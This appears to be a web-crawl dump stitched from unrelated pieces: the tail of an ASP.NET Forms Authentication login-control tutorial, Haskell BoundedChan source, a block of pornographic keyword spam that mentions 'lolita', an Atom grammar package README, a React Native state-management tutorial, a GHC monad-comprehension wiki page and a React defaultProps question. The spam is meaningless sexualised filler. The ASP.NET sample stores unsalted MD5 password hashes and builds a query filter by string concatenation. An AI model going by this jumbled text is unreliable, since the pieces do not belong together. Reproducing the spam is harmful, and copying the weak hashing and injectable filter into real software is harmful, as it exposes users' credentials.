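        users.Tables(0).Select("username = '" & _userName & "'")
    If matches.Length = 0 Then
        _statusMessage = "Username not found. Please register."
        _displayRegLink = True ' causes the "Register" link to render
        Return False
    End If
    ' Hash the supplied password and compare it to the stored hash.
    Dim hash As String = _
        FormsAuthentication.HashPasswordForStoringInConfigFile(_password, "MD5")
    If CStr(matches(0)("password")) = hash Then
        _statusMessage = "Login successful."
        Return True
    End If
    _statusMessage = "The password provided is incorrect."
    Return False
End Function
```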
That completes the control, so we can now compile it and prepare to use it in a page. There are several steps involved in this preparation.

The first thing we will do is create a new Web Application project, and then set up Forms Authentication by modifying the <authentication> section of the Web.config file at the root of the application (this file is added automatically when you create a new ASP.NET Web Application project) to look like the following:

   <authentication mode="Forms">
      <forms loginUrl="Login.aspx" protection="All">
      </forms>
   </authentication>

This tells ASP.NET to use Forms Authentication with this application (the default is Windows Authentication), that the name of the login page for the application is Login.aspx (this also happens to be the default, but it never hurts to be explicit), and to both encrypt the authentication cookie and validate that its contents have not been altered in transit.

Once Forms Authentication is configured, we use the <authorization> element to explicitly provide or restrict access to resources, based on usernames, group names, or wildcards ("*" for all users and/or "?" for anonymous users). If we add the <authorization> element to the Web.config file at the root of the application, the restriction(s) will apply to all files handled by ASP.NET within the application. Since our sample application will contain pages that we want all users to be able to access, we will start with the following in Web.config, which is the default:

   <authorization>
      <allow users="*" />
   </authorization>

Then, we will add the following, which prevents anonymous users from accessing the file ProtectMe.aspx. The <location> element provides the ability to apply configuration elements to a specific file or directory specified by its path attribute.
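Putting the two snippets above in context, the relevant portion of the root Web.config ends up looking like the following (other default elements are omitted for brevity):

```xml
<configuration>
   <system.web>
      <authentication mode="Forms">
         <forms loginUrl="Login.aspx" protection="All">
         </forms>
      </authentication>
      <authorization>
         <allow users="*" />
      </authorization>
   </system.web>
</configuration>
```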
You can also add an allowOverride attribute to specify whether the elements contained within the <location> element can be overridden by Web.config files in subdirectories of the application:

   <location path="ProtectMe.aspx">
      <system.web>
         <authorization>
            <deny users="?"/>
         </authorization>
      </system.web>
   </location>

The above configuration section needs to be placed inside the <configuration> element of Web.config, but outside the main <system.web> element (since it defines its own <system.web> element).

The last important configuration task is protecting the credentials file, which requires two steps. The first step is required because ASP.NET does not natively handle .xml files. As such, we need to tell IIS to pass requests for .xml files to ASP.NET, so that we can secure them using an HttpHandler provided for the purpose of preventing download of certain file types. To configure ASP.NET to handle .xml files, follow these steps:

Once the application mapping for .xml files has been set up, we can prevent the credentials file from being downloaded by adding the following section to Web.config:

   <httpHandlers>
      <add verb="*" path="Users.xml" type="System.Web.HttpForbiddenHandler"/>
   </httpHandlers>

This tells ASP.NET to refuse any requests for the file Users.xml by assigning the HttpForbiddenHandler to that filename.

Now that our client application is configured, we will take a look at how the control is used in a page. First, we will add a login page to the Web Application project by right-clicking the project and selecting Add > Add Web Form, and naming the file Login.aspx. With Login.aspx open in Design mode, let us take a moment to add the RegLogin control to the Visual Studio .NET toolbox, using the following steps:

Figure 6. The Customize Toolbox dialog

Figure 7. The RegLogin control in the Toolbox

Now we are ready to use the control.
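For reference, a minimal Users.xml produced by WriteXml might look like the following. The element names are assumptions (the article does not show the file's schema), but the stored value illustrates the format produced by HashPasswordForStoringInConfigFile: the MD5 hash of "password" for the default TempUser account mentioned later in the article.

```xml
<users>
   <user>
      <username>TempUser</username>
      <password>5F4DCC3B5AA765D61D8327DEB882CF99</password>
   </user>
</users>
```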
To simplify the layout of the page, use the Properties window to change the pageLayout property (you may need to select the DOCUMENT object in the drop-down list to access this property) to FlowLayout. Then, simply double-click the RegLogin control in the toolbox, and it will be added to the page. (Note that when you add a custom control from the Toolbox, the @ Register directive that is required to use the control is automatically added for you; you can view the @ Register directive by switching to HTML view.) Place the cursor after the control and press Enter to add a line break, and then add a Label control to the page (for the status message) by either double-clicking the Label control in the Toolbox, or dragging it onto the page.

Next, we will add event handlers for the events exposed by the control. Right-click Login.aspx and select View Code. This will load the codebehind module for the page into the code editor. In the Page_Load event handler, we will set the Visible property for the Label control to False, since we do not want the label to be displayed unless we have a message to display:

   Private Sub Page_Load(ByVal sender As System.Object, _
      ByVal e As System.EventArgs) Handles MyBase.Load
      Label1.Visible = False
   End Sub

Next, we will add event handlers for each of the events that are raised by the RegLogin control.
Remember that you can use the Class Name and Member Name drop-downs to easily insert the signature for events and methods for the controls in a page:

   Private Sub RegLogin1_AuthSuccess(ByVal sender As Object, _
      ByVal e As System.EventArgs) Handles RegLogin1.AuthSuccess
      If Not Request.QueryString("ReturnUrl") Is Nothing Then
         DoRedirect = True
      End If
   End Sub

   Private Sub RegLogin1_AuthFailure(ByVal sender As Object, _
      ByVal e As System.EventArgs) Handles RegLogin1.AuthFailure
      Label1.ForeColor = System.Drawing.Color.Red
      Label1.Text = RegLogin1.StatusMessage
      Label1.Visible = True
   End Sub

   Private Sub RegLogin1_RegSuccess(ByVal sender As Object, _
      ByVal e As System.EventArgs) Handles RegLogin1.RegSuccess
      Label1.ForeColor = System.Drawing.Color.Green
      Label1.Text = RegLogin1.StatusMessage
      Label1.Visible = True
   End Sub

   Private Sub RegLogin1_RegFailure(ByVal sender As Object, _
      ByVal e As System.EventArgs) Handles RegLogin1.RegFailure
      Label1.ForeColor = System.Drawing.Color.Red
      Label1.Text = RegLogin1.StatusMessage
      Label1.Visible = True
   End Sub

In all of the events except for AuthSuccess (where we do a little extra), we set the ForeColor of the Label control to either red (for failure) or green (for success), set the Text of the label to the StatusMessage property of the RegLogin control, and set the label's Visible property to True.

The AuthSuccess event is a special case. When a user requests a page that is restricted by ASP.NET authorization in an application protected by Forms Authentication, they are automatically redirected to the configured login page. Once they have successfully authenticated, we want to redirect the user to the page that they originally requested. This can be a little tricky for a couple of reasons. First, we have to make sure that the login page was not the page originally requested by the user. This is accomplished by testing whether the ReturnUrl querystring variable is null (Is Nothing) in the AuthSuccess event handler.
The second tricky bit is that if we try to redirect to the original page from within the AuthSuccess event handler itself, the redirect will not succeed. Instead, we add a Boolean, DoRedirect, to the codebehind module, and set its value to True when the AuthSuccess event is fired, assuming that ReturnUrl is not null. Then we add a handler for the PreRender event, which fires after the control events but before the page is rendered, and perform the redirect there, assuming that we have set DoRedirect to True. If ReturnUrl is null, we simply set the status message and show the label.

To test the login page, we will need a protected page, which in the sample files is called ProtectMe.aspx. ProtectMe.aspx consists of a Label control, which is set to display the name of the logged-in user in Page_Load, and an instance of the LoginStatus control (see the section below entitled Bonus Control: LoginStatus), which provides the user with the ability to log out once they have logged in. Also included in the project is a page called Unprotected.aspx, which demonstrates the use of the LoginStatus control to log in, as well as log out.

To test the login page, first ensure that both the control project and the Web Application project have been compiled. Then, right-click ProtectMe.aspx, select Browse With..., choose Microsoft Internet Explorer, and click Browse. You will be redirected to the login page, which should look similar to Figure 8.

Figure 8. Redirected to the login page

Attempt to log in using any username and password. If you receive a security exception, you will need to temporarily provide write access for the ASPNET account to the root of the web application, repeat the previous steps, and then remove write access for the root of the application. When you attempt to log in using a username that does not exist, you should be prompted to register, as shown in Figure 9.
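The deferred redirect described above might look like the following sketch in the codebehind; DoRedirect is the Boolean field the text names, while the exact redirect call is an assumption:

```vbnet
' Hypothetical sketch of the deferred redirect described in the text.
Private DoRedirect As Boolean = False

Private Sub Page_PreRender(ByVal sender As Object, _
        ByVal e As System.EventArgs) Handles MyBase.PreRender
    ' PreRender fires after the control events have run, so a
    ' redirect issued here succeeds.
    If DoRedirect Then
        Response.Redirect(Request.QueryString("ReturnUrl"))
    End If
End Sub
```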
If you click the Register link, the page will post back, and the control will switch to register mode, as shown in Figure 10 (note that the username you entered is preserved).

Figure 9. Prompting for registration

Figure 10. The registration UI

If you provide a unique username and password (and password confirmation), and click Submit, the display should look similar to Figure 11.

Figure 11. Successful registration

Now, attempt to log in using the username and password you supplied (or you can use the username "TempUser" and the password "password," which are added as a default when the credentials file is created), and the result should look similar to Figure 12 (note that we have been redirected to the page originally requested).

Figure 12. Result of a successful login

In addition to the RegLogin control, the sample code for this article contains a bonus control, the LoginStatus control, which is a simplified version of the control of the same name that is included in ASP.NET Whidbey. The LoginStatus control queries Page.User.Identity to determine whether the user is logged in; when the user logs out, the control calls the SignOut method of the FormsAuthentication helper class and redirects to the current URL (causing the user to automatically be directed to the login page if the page they are currently viewing does not allow anonymous access). The LoginStatus control also contains a designer class that demonstrates a simple example of using the GetDesignTimeHtml method of the ControlDesigner class to customize how your control is displayed on the Visual Studio .NET design surface.

In this article, we have looked at the process of creating a reusable login and registration control, including reading from and writing to an XML credentials file, hashing passwords, using Forms Authentication, configuring authorization, handling postbacks and raising events, and protecting files as desired.
Using the techniques explored in this article, you can create a consistent, reusable UI for authenticating users within your applications, and one that does not require you to wait for Whidbey to arrive.

The sample code for this article contains a Visual Studio .NET project for both the RegLogin and LoginStatus controls, and for the Web Application that consumes the controls. To run the RegLoginClient application, you will need to copy the files to your computer, then create an IIS application (virtual root) and map it to the folder where you copied the files.

G. Andrew Duthie is the founder and principal of Graymad Enterprises, Inc., providing training and consulting in Microsoft Web development technologies. Andrew has been developing multi-tier Web applications since the introduction of Active Server Pages. He has written numerous books on ASP.NET, including Microsoft ASP.NET Step By Step, Microsoft ASP.NET Programming with Microsoft Visual Basic, and ASP.NET in a Nutshell. Andrew is a frequent speaker at events including Software Development, the Dev-Connections family of conferences, Microsoft Developer Days, and VSLive! He also speaks at .NET user groups as a member of the International .NET Association (INETA) Speaker's Bureau. You can find out more about Andrew at his company's Web site, Graymad Enterprises, Inc.
http://msdn.microsoft.com/en-us/library/aa478962.aspx
-- LOCK ORDERING: A -> B ->. If you have multiple writers, be careful
-- here, because the unlocking is not guaranteed to avoid starvation.
writeChan :: BoundedChan a -> a -> IO ()
writeChan (BC size contents wposMV _) x = do
  wpos <- takeMVar wposMV
  putMVar wposMV $! (wpos + 1) `mod` size
  putMVar (contents ! wpos) x

-- |Read an element from the channel. If the channel is empty, this routine
-- will block until it is able to read.
readChan :: BoundedChan a -> IO a
readChan (BC size contents _ rposMV) = do
  rpos <- takeMVar rposMV
  putMVar rposMV $! (rpos + 1) `mod` size
  takeMVar (contents ! rpos)

-- |Returns 'True' if the supplied channel is empty.
isEmptyChan :: BoundedChan a -> IO Bool
isEmptyChan (BC _ contents _ rposMV) = do
  rpos <- takeMVar rposMV
  res <- isEmptyMVar (contents ! rpos)
  putMVar rposMV rpos
  return res

-- |Return a lazy list representing the contents of the supplied channel.
getChanContents :: BoundedChan a -> IO [a]
getChanContents ch = unsafeInterleaveIO $ do
  x <- readChan ch
  xs <- getChanContents ch
  return (x:xs)
{-# NOINLINE getChanContents #-}

-- |Write a list of elements to the channel. If the channel becomes full, this
-- routine will block until it is able to write.
writeList2Chan :: BoundedChan a -> [a] -> IO ()
writeList2Chan = mapM_ . writeChan
http://hackage.haskell.org/package/BoundedChan-1.0.0.1/docs/src/Control-Concurrent-BoundedChan.html
Wear xxx. Sucking cards. College licks. Pussys xplormedia anatuers or lesbians! Cunt domination. Dick stocking you chick website! Cook amputee email shooting blondes very oily lolita ass her pinup stocking photos ebony black show pussy anal crazy credit dowloading ass anatuers people gay olson women warcarft hs hot star spy movie porn. Her oily wife domination site naked? And nude easy free cook bushes image tan show male piss show. You cam 800 myspace japaneses jessica! Lick fuck vaginas. Temple video ladies bushes piss huge. Drive blondes seventies. Cocks shooting no tongue myspace home blond. Burning blog blond for munch animal naked my cock hunt. Nude pic! En licking moms reality womens. Short myspace dowloading fucking fatties lolita swim my me i.e. Drinking cam. Hardcore jessica mailing sucking needed foot amber pussys jessica cunt mom giant gay cock 800 at she. Drinking penis pornografica pregnant hollywood pictures drinking hole crazy piss accion! Fisting stories pinup girls sussex porno Reynolds. Giant cum! Hunks girls free credit porno Fort huge wife twins sucking white hollywood people lesbian mom giant models porn movie burning womens very wemon tan clits. And wifey amatuer men? Com amputee clits licking taiwan ebony hairy video wemon nude her outdoors. Swim red gay fuck ladies hairy drive girl transexual Monotropa.
http://uk.geocities.com/being382chat/sxwyl-na/killer-sex-jill-kelly.htm
crawl-002
refinedweb
3,290
76.22
apm install

0 - For the apm install command to work, you must have Python 2.7 in your PATH (node-gyp only works with Python 2; see issue -). You can check which version is available by typing python --version. If it is another version, consider modifying your PATH just for installing this package: run echo $PATH and remove any path that leads to another Python version (e.g. ~/anaconda3/bin), or append export PATH=/usr/bin/:$PATH, assuming you have Python 2 in that directory. Alternatively, export PYTHON=/usr/bin/python2.7 may work, although I haven't tested it.

1 - apm install. This installs the Atom package in ~/.atom/packages.

2 - Start Atom.

3 - In Atom, open a file containing RaiDelve code that has the file extension ".delve". Ideally, you will see some code highlighted.

You may also need to do the following, depending on your machine:

A - Restart Atom after setting the stylesheet.

B - You may have to set the language in Atom so that it recognizes the file as RaiDelve code. It is supposed to autodetect files ending in ".delve", but that has not always worked. See the bottom right-hand corner of the Atom editor for the language setting.

C - Add the contents of styles.less from this package to the global stylesheet. Either open "Stylesheet" from the menu and paste the contents there, or use the command palette (ctrl-shift-p) and search for "Open Your Stylesheet". This is the global style settings for Atom. You should get some styling by default; this just lets you choose which color gets applied to which subset of tokens.

To verify the parser: open a .delve file and set the language to raidelve. Place your cursor in front of a keyword (e.g. and), then use the command palette (ctrl-shift-p) and search for "Log Cursor Scope". Select that command and you should see a popup in the editor.
If the parser is working correctly, you should see "delve" and "keyword.control". If you see "delve" and something else, your cursor may not be in front of and. If you do not see the word "delve" in the popup at all, the parser is not working; see step 1.

On some machines, you can edit the colors in the styles.less file (in Atom) and the colors change immediately, though I'm not convinced that always works. If the colors in the delve file change when you change them in styles.less, your style selection is working. If the colors do not change, or if there are no colors for left-hand-side variables — in def sales_event_type[salesevent], when everything is working, the def should be blue and the salesevent should be green — try the following: a) check that the contents of styles.less from this package are saved in the Atom global stylesheet (see step 3), or b) restart Atom after you save the contents into the stylesheet. If parsing is working correctly but the styling is not, you may still see some highlighting; this is because Atom has some generic CSS defined for certain keywords that overlaps with some of the output from this package.

Atom autoupdated and now I see an error when I open Atom about npm or a NODE_MODULE_VERSION mismatch. In this case, I found the following to fix it:

1) Go to your package directory (~/.atom/packages/delve-language) and run npm rebuild --update-binary and then npm install.
2) Also run apm rebuild --update-binary and then apm install.

I needed to do export CC=clang and export CXX=clang++ to get npm rebuild to run without errors. You don't need these steps unless we need to debug the npm parser, which may happen if we change the grammar and need to update the parser.
We have a raidelve parser: an npm package called tree-sitter-delve-language. It should be installable via npm on the command line:

npm install -g tree-sitter-delve-language

This repo needs to be installed into Atom (run from this directory):

apm install

Then open any file ending in .delve that has code in it.

style.less - how we select and color different items. This needs to be added to your styles.less. Ideally, this would get imported as part of the package, but I can't figure out how to do that.

package.json - where we specify the dependencies (including the npm package).

grammars/tree-sitter-delve.cson - where you define the CSS selectors to highlight different aspects of the code.

Resources

Tree Sitter grammar spec for delve
How to add a new grammar to Atom using the Tree Sitter syntax
A walkthrough that shows how to add a grammar to Atom
Create Syntax Highlighting Package

You might need npm install -g node-gyp.

Additional notes: You can test whether the parser is working by placing your cursor before something in the code and running the Log Cursor Scope command (on a Mac this is Command + Option + P). For example, doing this in front of the keyword and should result in a popup that says "delve" "keyword.control". If you see this, the parser is correctly parsing delve. These scopes are how we set up the CSS selectors. In styles.less you can see how the scopes (like delve and keyword.control) get mapped from the left-hand side to the right-hand-side (CSS) selectors. In some documentation, you may see something about using patterns to make selections (in grammars/tree-sitter-delve.cson), but because we are using a tree-sitter parser, you have to wrap this into the scope hierarchy.
https://api.atom.io/packages/language-raidelve
State Management in React Native

Managing state is one of the most difficult concepts to grasp while learning React Native, as there are so many ways to do it. There are countless state management libraries on the npm registry, such as Redux, and there are endless libraries built on top of other state management libraries to simplify the original library itself, like Redux Easy. Every week, a new state management library is introduced in React, but the base concepts of maintaining application state have remained the same since the introduction of React.

The most common way to set state in React Native is by using React's setState() method. We also have the Context API, which avoids prop drilling and passes state down many levels without passing it to each individual child in the tree. More recently, Hooks arrived in React v16.8.0 as a new pattern to simplify the use of state; React Native got them in v0.59.

In this tutorial, we'll learn about what state actually is, and about the setState() method, the Context API and React Hooks. This is the foundation of setting state in React Native. All state management libraries are built on top of these base concepts, so once you know them, understanding a library or creating your own state management library will be easy.

What Is a State?

Anything that changes over time is known as state. If we had a counter app, the state would be the counter itself. If we had a to-do app, the list of to-dos would change over time, so this list would be the state. Even an input element is in a sense state, as it changes over time as the user types into it.

Intro to setState

Now that we know what state is, let's understand how React stores it.
Consider a simple counter app:

    import React from 'react'
    import { Text, Button } from 'react-native'

    class Counter extends React.Component {
      constructor(props) {
        super(props)
        this.state = { counter: 0 }
      }

      render() {
        const { counter } = this.state
        return (
          <>
            <Text>{counter}</Text>
            <Button title="+" onPress={() => {}} />
            <Button title="-" onPress={() => {}} />
          </>
        )
      }
    }

In this app, we store our state inside the constructor in an object and assign it to this.state. Remember, state can only be an object; you can't directly store a number. That's why we created a counter variable inside an object. In the render method, we destructure the counter property from this.state and render it inside a Text element. Note that currently it will only show a static value (0).

You can also write your state outside of the constructor, as a class property:

    import React from 'react'
    import { Text, Button } from 'react-native'

    class Counter extends React.Component {
      state = { counter: 0 }

      render() {
        const { counter } = this.state
        return (
          <>
            <Text>{counter}</Text>
            <Button title="+" onPress={() => {}} />
            <Button title="-" onPress={() => {}} />
          </>
        )
      }
    }

Now let's suppose we want the + and - buttons to work. We must write some code inside their respective onPress handlers:

    import React from 'react'
    import { Text, Button } from 'react-native'

    class Counter extends React.Component {
      state = { counter: 0 }

      render() {
        const { counter } = this.state
        return (
          <>
            <Text>{counter}</Text>
            <Button title="+" onPress={() => { this.setState({ counter: counter + 1 }) }} />
            <Button title="-" onPress={() => { this.setState({ counter: counter - 1 }) }} />
          </>
        )
      }
    }

Now when we press the + and - buttons, React re-renders the component, because the setState() method was used. The setState() method re-renders the part of the tree that has changed; in this case, the Text element. So if we press +, it increments the counter by 1; if we press -, it decrements the counter by 1. Remember that you can't change the state directly by assigning to this.state; doing this.state = counter + 1 won't work.
Also, state changes are asynchronous operations, which means that if you read this.state immediately after calling this.setState, it won't reflect recent changes. This is where we use the "function as a callback" syntax for setState(), as follows:

    import React from 'react'
    import { Text, Button } from 'react-native'

    class Counter extends React.Component {
      state = { counter: 0 }

      render() {
        const { counter } = this.state
        return (
          <>
            <Text>{counter}</Text>
            <Button title="+" onPress={() => { this.setState(prevState => ({ counter: prevState.counter + 1 })) }} />
            <Button title="-" onPress={() => { this.setState(prevState => ({ counter: prevState.counter - 1 })) }} />
          </>
        )
      }
    }

The "function as a callback" syntax provides the most recent state (in this case prevState) as a parameter to the setState() method. This way we get the latest changes to state.

What Are Hooks?

Hooks are a new addition in React v16.8. Earlier, you could only use state by making a class component; you couldn't use state in a functional component itself. With the addition of Hooks, you can use state in functional components too.

Let's convert our Counter class component above into a functional component using React Hooks:

    import React from 'react'
    import { Text, Button } from 'react-native'

    const Counter = () => {
      const [ counter, setCounter ] = React.useState(0)
      return (
        <>
          <Text>{counter}</Text>
          <Button title="+" onPress={() => { setCounter(counter + 1) }} />
          <Button title="-" onPress={() => { setCounter(counter - 1) }} />
        </>
      )
    }

Notice that we've reduced our class component from 18 lines to just 12 lines of code, and the code is much easier to read.

Let's review the above code. Firstly, we use React's built-in useState method. The value passed to useState can be of any type (a number, a string, an array, a boolean, an object, or any other type of data), unlike setState(), which can only take an object. In our counter example, it takes a number and returns an array with two values. The first value in the array is the current state value, so counter is currently 0.
The second value in the array is the function that lets you update the state value. In our onPress handlers, we can then update counter using setCounter directly. Thus our increment becomes setCounter(counter + 1) and our decrement becomes setCounter(counter - 1).

React has many built-in Hooks, like useState, useEffect, useContext, useReducer, useCallback, useMemo, useRef, useImperativeHandle, useLayoutEffect and useDebugValue, which you can find more info about in the React Hooks docs. Additionally, we can build our own custom Hooks.

There are two rules to follow when building or using Hooks:

1. Only call Hooks at the top level. Don't call Hooks inside loops, conditions, or nested functions. This ensures that Hooks are called in the same order each time a component renders, which is what allows React to correctly preserve the state of Hooks between multiple useState and useEffect calls.

2. Only call Hooks from React functions. Don't call Hooks from regular JavaScript functions. Instead, you can either call Hooks from React functional components or call Hooks from custom Hooks. By following this rule, you ensure that all stateful logic in a component is clearly visible from its source code.

Hooks are really simple to understand, and they're helpful when adding state to a functional component.

The Context API

Context provides a way to pass data through the component tree without having to pass props down manually at every level. In a typical React Native application, data is passed top-down via props. If there are multiple levels of components in the React application, and the last child in the component tree wants to retrieve data from the top-most parent, then you'd have to pass props down individually through every level.

Consider the example below. We want to pass the value of theme from the App component to the Pic component. Typically, without using Context, we'd pass it through every intermediate level as follows:

    const App = () => (
      <>
        <Home theme="dark" />
        <Settings />
      </>
    )

    const Home = ({ theme }) => (
      <>
        <Profile theme={theme} />
        <Timeline />
      </>
    )

    const Profile = ({ theme }) => (
      <>
        <Pic theme={theme} />
        <ChangePassword />
      </>
    )

The value of theme goes from App -> Home -> Profile -> Pic. The above problem is known as prop drilling.
This is a trivial example, but consider a real-world application where there are tens of different levels. It becomes hard to pass data through every child just so it can be used in the last child. Therefore, we have Context. Context allows us to directly pass data from App -> Pic. Here's how to do it using the Context API:

    import React from 'react'

    const ThemeContext = React.createContext("light") // set light as default

    const App = () => (
      <ThemeContext.Provider value="dark">
        <Home />
        <Settings />
      </ThemeContext.Provider>
    )

    const Home = () => (
      <>
        <Profile />
        <Timeline />
      </>
    )

    const Profile = () => (
      <ThemeContext.Consumer>
        {theme => (
          <>
            <Pic theme={theme} />
            <ChangePassword />
          </>
        )}
      </ThemeContext.Consumer>
    )

Firstly, we create ThemeContext using the React.createContext API, with light as the default value. Then we wrap our App component's root element with ThemeContext.Provider, providing dark as the value. Lastly, we use ThemeContext.Consumer as a render prop to get the theme value of dark.

The render prop pattern is nice, but if we have multiple contexts it can result in callback hell. To save ourselves from callback hell, we can use the useContext Hook instead of ThemeContext.Consumer. The only thing we need to change is the Profile component's implementation:

    const Profile = () => {
      const theme = React.useContext(ThemeContext)
      return (
        <>
          <Pic theme={theme} />
          <ChangePassword />
        </>
      )
    }

This way, we don't have to worry about callback hell.

Sharing State across Components

Until now, we've only managed state within a single component. Now we'll look at how to manage state across components. Suppose we're creating a simple to-do list app as follows:

    import React from 'react'
    import { View, Text } from 'react-native'

    const App = () => (
      <>
        <AddTodo />
        <TodoList />
      </>
    )

    const TodoList = ({ todos }) => (
      <View>
        {todos.map(todo => (
          <Text> {todo} </Text>
        ))}
      </View>
    )

Now, if we want to add a to-do from the AddTodo component, how will it show up in the TodoList component's todos prop?
The answer is "lifting state up". If two sibling components want to share state, then the state must be lifted up to the parent component. The completed example should look like this:

    import React from 'react'
    import { View, Text, TextInput, Button } from 'react-native'

    const App = () => {
      const [ todos, setTodos ] = React.useState([])
      return (
        <>
          <AddTodo addTodo={todo => setTodos([...todos, todo])} />
          <TodoList todos={todos} />
        </>
      )
    }

    const AddTodo = ({ addTodo }) => {
      const [ todo, setTodo ] = React.useState('')
      return (
        <>
          <TextInput value={todo} onChangeText={value => setTodo(value)} />
          <Button title="Add Todo" onPress={() => {
            addTodo(todo)
            setTodo('')
          }} />
        </>
      )
    }

    const TodoList = ({ todos }) => (
      <View>
        {todos.map(todo => (
          <Text> {todo} </Text>
        ))}
      </View>
    )

Here, we keep the state in the App component. We use the React Hook useState to store todos as an empty array. We then pass the addTodo method to the AddTodo component and the todos array to the TodoList component.

The AddTodo component takes in the addTodo method as a prop. This method should be called once the button is pressed. We also have a TextInput element, which likewise uses the useState Hook to keep track of its changing value. Once the Button is pressed, we call the addTodo method passed down from the parent App. This makes sure the to-do is added to the list of todos, and afterwards we empty the TextInput box.

The TodoList component takes in todos and renders the list of to-do items given to it. You can also try deleting a to-do to practice lifting state up yourself.
Here's the solution:

    const App = () => {
      const [ todos, setTodos ] = React.useState([])
      return (
        <>
          <AddTodo addTodo={todo => setTodos([...todos, todo])} />
          <TodoList
            todos={todos}
            deleteTodo={todo => setTodos(todos.filter(t => t !== todo))}
          />
        </>
      )
    }

    const TodoList = ({ todos, deleteTodo }) => (
      <View>
        {todos.map(todo => (
          <Text>
            {todo}
            <Button title="x" onPress={() => deleteTodo(todo)} />
          </Text>
        ))}
      </View>
    )

This is the most common practice in React. Lifting state up is not as simple as it seems, though. This is an easy example, but in a real-world application we don't know in advance which state will need to be lifted up to a parent for use in a sibling component. So at first, keep state in the component itself, and only lift state up to the parent when a situation arises where it has to be shared between components. This way you avoid turning your parent component into one big state object.

Conclusion

To sum up, we looked at what state is and how to set its value using the setState() API provided by React. We also looked at React Hooks, which make it easy to add state to a functional component without having to convert it to a class component. We learned about the new Context API and its Hooks counterpart useContext, which help us stay away from render prop callback hell. Finally, we learned about lifting state up to share state between sibling components.

React becomes very simple once you understand these core concepts. Remember to keep state as local to a component as possible. Use the Context API only when prop drilling becomes a problem. Lift state up only when you need to. Finally, check out state management libraries like Redux and MobX once your application gets complex and it's hard to debug state changes.
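As a closing aside, the rules of Hooks mentioned above can be made concrete with a toy model. The sketch below is my own illustration and deliberately not React's actual implementation: it stores state in an array indexed purely by call order, which is exactly why Hooks must be called unconditionally at the top level (a conditionally skipped call would shift every later Hook onto the wrong slot).

```javascript
// Toy useState: state lives in an array, matched to calls by order only.
const hookStates = [];
let hookIndex = 0;

function useState(initialValue) {
  const index = hookIndex++;
  if (hookStates[index] === undefined) {
    hookStates[index] = initialValue; // first render: seed the slot
  }
  const setState = (value) => {
    hookStates[index] = value; // later renders read the updated slot
  };
  return [hookStates[index], setState];
}

// Each "render" resets the index, so Hooks must run in the same order
// every time for each call to land on its own slot.
function render(component) {
  hookIndex = 0;
  return component();
}

function Counter() {
  const [count, setCount] = useState(0);
  const [label] = useState('clicks');
  return { count, label, increment: () => setCount(count + 1) };
}

let ui = render(Counter);
ui.increment();
ui = render(Counter);
console.log(ui.count, ui.label); // 1 clicks
```

Calling useState inside an if here would corrupt the slot assignment on the next render, which is the failure mode the first rule guards against.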
https://www.sitepoint.com/state-management-in-react-native/?utm_source=rss
Monad comprehensions

Monad comprehensions were added to the main GHC repository on the 4th May 2011. See ticket #4370.

Translation rules

Variables: x and y
Expressions: e, f and g
Patterns: w
Qualifiers: p, q and r

The main translation rule for monad comprehensions:

  [ e | q ] = [| q |] >>= (return . (\q_v -> e))

(.)_v rules. Note that _v is a postfix rule application.

  (w <- e)_v = w
  (let w = d)_v = w
  (g)_v = ()
  (p, q)_v = (p_v, q_v)
  (p | q)_v = (p_v, q_v)
  (q, then f)_v = q_v
  (q, then f by e)_v = q_v
  (q, then group by e using f)_v = q_v
  (q, then group using f)_v = q_v

[|.|] rules.

  [| w <- e |] = e
  [| let w = d |] = return d
  [| g |] = guard g
  [| p, q |] = ([| p |] >>= (return . (\p_v -> [| q |] >>= (return . (\q_v -> (p_v, q_v)))))) >>= id
  [| p | q |] = mzip [| p |] [| q |]
  [| q, then f |] = f [| q |]
  [| q, then f by e |] = f (\q_v -> e) [| q |]
  [| q, then group by e using f |] = (f (\q_v -> e) [| q |]) >>= (return . (unzip q_v))
  [| q, then group using f |] = (f [| q |]) >>= (return . (unzip q_v))

unzip(.) rules. Note that unzip is a desugaring rule (i.e., not a function to be included in the generated code).

  unzip ()      = id
  unzip x       = id
  unzip (w1,w2) = \e -> ((unzip w1) (e >>= (return . (\(x,y) -> x))),
                         (unzip w2) (e >>= (return . (\(x,y) -> y))))

Examples

Some translation examples, using the do notation to avoid things like pattern-matching failures:

  [ x+y | x <- Just 1, y <- Just 2 ]
  -- translates to:
  do x <- Just 1
     y <- Just 2
     return (x+y)

Transform statements:

  [ x | x <- [1..], then take 10 ]
  -- translates to:
  take 10 (do x <- [1..]
              return x)

Grouping statements (note the change of types):

  [ (x :: [Int]) | x <- [1,2,1,2], then group by x ] :: [[Int]]
  -- translates to:
  do x <- mgroupWith (\x -> x) [1,2,1,2]
     return x

Parallel statements:

  [ x+y | x <- [1,2,3] | y <- [4,5,6] ]
  -- translates to:
  do (x,y) <- mzip [1,2,3] [4,5,6]
     return (x+y)

Note that the actual implementation does not use the do notation; it is only used here to give a basic overview of how the translation works.

Implementation details

Monad comprehensions had to change the StmtLR data type in the hsSyn/HsExpr.lhs file in order to be able to look up and store all the functions required to desugar monad comprehensions correctly (e.g. return, (>>=), guard, etc.). Renaming is done in rename/RnExpr.lhs and typechecking in typecheck/TcMatches.lhs. The main desugaring is done in deSugar/DsListComp.lhs. If you want to start hacking on monad comprehensions, I'd look at those files first.

Some things you might want to be aware of: [todo]
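As a quick sanity check of the main translation rule, here is a small, self-contained sketch (my own example, not from the wiki page; it assumes GHC with the MonadComprehensions extension enabled). The comprehension and its hand-desugared form, simplified from the rule above, should agree:

```haskell
{-# LANGUAGE MonadComprehensions #-}

-- A comprehension over Maybe.
comprehension :: Maybe Int
comprehension = [ x + y | x <- Just 1, y <- Just 2 ]

-- The same program after applying
--   [ e | q ] = [| q |] >>= (return . (\q_v -> e))
-- by hand and simplifying the qualifier tuple:
desugared :: Maybe Int
desugared = (Just 1 >>= \x -> Just 2 >>= \y -> return (x, y))
              >>= (return . (\(x, y) -> x + y))

main :: IO ()
main = print (comprehension == desugared && comprehension == Just 3)
```

Running main should print True, since both forms evaluate to Just 3.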
https://ghc.haskell.org/trac/ghc/wiki/MonadComprehensions?version=7
I'm trying to set a defaultProp with an object literal, but after some time I realized that the React class constructor is not merging the default props with the applied props, so I end up with undefined values for any properties in the defaultProps literal that haven't been included in the applied props. Is there a way to merge default props and applied props, or do I need to break up my object into several props?

    class Test extends React.Component {
      constructor(props) {
        super(props);
        // props.test is only {one: false}
        // props.test.two is undefined
      }

      render() {
        return (<div>render</div>)
      }
    }

    Test.defaultProps = {
      test: {
        one: true,
        two: true
      }
    }

    ReactDOM.render(<Test test={{'one': false}} />, document.getElementById('test'));

